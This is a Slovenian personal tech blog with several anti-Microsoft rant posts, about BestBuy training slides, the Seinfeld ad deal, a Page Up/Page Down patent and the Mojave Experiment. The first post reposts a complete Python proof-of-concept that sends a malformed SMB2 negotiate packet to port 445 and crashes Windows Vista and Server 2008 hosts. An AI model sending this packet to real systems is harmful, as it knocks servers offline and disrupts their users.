Another day in a geek’s life

Pred par dnevi je na slashdotu pojavil topic¹  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 “ql”, in kok je Linux “beden”.  Konkreten slajd, ki mi je privlekel pozornost je bil tudi:

Torej… ko pride do kakega grdega b00ga, exploita ipd, so userji “on their own”, če uporabljajo Microsoft priozvode, so pa “safe and secure”…

No in danes mi je @Kostko poslal zanimiv link (click here), kjer se nahaja kratka python skripta, ki na oddaljeni mašini sproži BSOD.  In kako je sedaj z ‘zagarantirano varnostjo’? Citiram:

Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.

Hmm.. očitno bo najbolje da izklopimo M$ file serverje, zakurimo ogenj in čakamo

In za vsak slučaj, da ne bi exploit kam izginil, dajem kopijo sem:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
 
)
s = socket()
 
s.connect(host)
s.send(buff)
s.close()

ps:  zadeva se je pojavila tudi na slashdotu (click here)

pps:

(21:19:09) Anze: na zobavniku potrjeno bsod dela na visti
(21:19:12) Anze: win7 je safe <--????
(21:19:16) Anze: win 2k8 pade

geek stuff, rant 0-day, exploit, linux, microsoft, python

Očitno je M$ spet naredil sranje… remote code execution zakon

Me prov zanima kje use se že nahajajo exploiti

LINK

crap, geek stuff, rant 0day, exploit, lol, microsoft

Se spomnite Microsoftovih reklam s Seinfieldom? (prva in druga)? Sodeč po tej strani je Microsoft plačal Seinfieldu 10.000.000$ (jap.. 10 milijonov)… Če ste si ogledali reklame, se najbrž čudite. Očitno so si tudi v Microsoftu premislili.

Sodeč po tem linku bodo pa zdaj prenehali sodelovanje s Seinfieldom. In najbolj zanimiva izjava? “Redmond had always planned to drop Seinfeld.” Vprašanje je le, a to že pred podpisom 10M usd vredne pogodbe, ali kmalu za tem? No ja… očitno majo res preveč denarja

crap lol, microsoft, seinfield

Gdo ne razume imena patenta? Naj samo omenim da je to Micro$oftov patent… pa gremo:

Poglejmo izvleček:

A method and system in a document viewer for scrolling a substantially exact increment in a document, such as one page, regardless of whether the zoom is such that some, all or one page is currently being viewed. In one implementation, pressing a Page Down or Page Up keyboard key/button allows a user to begin at any starting vertical location within a page, and navigate to that same location on the next or previous page. For example, if a user is viewing a page starting in a viewing area from the middle of that page and ending at the bottom, a Page Down command will cause the next page to be shown in the viewing area starting at the middle of the next page and ending at the bottom of the next page. Similar behavior occurs when there is more than one column of pages being displayed in a row.

Vir: www.patentstorm.us

Hmm.. se že bolj razume? Ene par besed umes je jasnih… in ja… Microsoftu je dejansko uspelo patentirati “Page up” in “Page down”. Kar je (po mojem mišljenju) precej zanimivo, še posebej ker sta ti dve tipki obstajali še dosti pred tem, ko se je Microsoft začel ukvarjati s čimerkoli podobnim (baje(!) že na IBM-ovem S/34).

In kako jim je to ratal? Po ameriško seveda. Uzameš nekaj, kar je že splošno znano, in dodaš čudno ime (”metoda in sistem”), zakompliciraš opis, in imaš za sabo eno izmed največjih pravniških ekip v ameriki (in najbrž tudi na svetu). Seveda, če imaš slednje, se podrazumeva da imaš tudi dovolj denarja in dovolj moči v državi in na tržišču.

In zakaj je to problem? Predvsem zato, ker tako delovanje (pomik za eno stran gor-dol) uporablja mnogo ne-Microsoftovih aplikacij. S tem patentom Microsoft (če dokaže da neka aplikacija uporablja Microsoftov patent) lahko uloži tožbo proti podjetjem/programerjem/… Ker pa je večina podjetij, precej manjših od Microsofta, in ker na***ejo še posebej pisci odprtokodnih programov, ki ponavadi sploh nimajo nikogar za sabo, tak patent lahko povzroči totalni kaos. Me pa zanima (pravniki pomoč!), kako je z aplikacijami, ki so to ‘tehnologijo’ uporabljale še pred microsoftovim patentom? Oz tudi celo pred Microsoftovo implementacijo page up/down v katerikoli microsoftov program?

Sicer nevem čigava ideja je bila narediti page-up in page-down, bi blo pa zanimivo če bi to bil IBM. Se še kdo spomni IBM vs. SCO? )

Link: še en članek na to temo

ps: se opravičujem ker je ta post nastal še enkrat, imel sem manjši problem z bazo
pps: Jure, tudi tvoj comment je žal izginil zaradi baze, napisal si da se morajo upoštevati vsi claimi tam napisani (in tudi formule). Tiste formule so samo najbolj enostavne formule za izračun pozicije na strani. Vse ostalo se nanaša na to, da če se premakne za en ‘ekran’ dol, je ok, če se premakne za eno ’stran’ (torej celo stran, ne glede na to kolikor jo je vidne na ekranu), pa ni več “ok”. Tudi v nekaterih odprtokodnih aplikacijah se pageup/down tako obnasa.

rant microsoft, patent

Cesa tok lame osebno se nism vidu. Reklama za tweezy je bolj avtenticna od tega.

http://www.mojaveexperiment.com/

Najolj zanimivo mi je blo, da so mogl pisat ocene za sistem, ki ga niti niso vidl, niti ne uporabljal. In potem prva zenska napise uno velko nulo (ceprov naj bi to bla kao skrita kamera? al kaj naj bi blo? niti sam nism razumeu unih kadrov iz enga vogala posnetih k zgleda k da je skrito.). In potem k vid, cisto desetko  na velko cez ceu list spet. Pa tud, zakaj pise na prazn list tok na velko ce naj bi bla skrita kamera? ce pa naj nebi bla pa spet… zakaj snemano iz kota. Potem pa se una izjava ‘i like this security feature’.. wtf? covek ki ni vidu usaj screenshota vista prepozna ’secrity feature’ in se rece da mu je usec? pa potem se una ‘i like gadgets’? A ni gadget v tem pomenu izmisljotina microsofta, da bi kontriral ‘widgetu’?
potem.. ce kliknes ‘you cant please everyone’… kako clovk ki ni uporablu viste in kao ne ve kako zgleda  (ker kao ni prepoznau) lahko rece ‘why is it faster?’ ce nima s cem primerjat

edina stvar ki mi je bla na tej strani ql je flash efekt pri izbiranju videov

se opravicujem, sam mogu sm skurcat… cesa bolj lame se nism vidu.

crap, rant lame, microsoft, vista, windows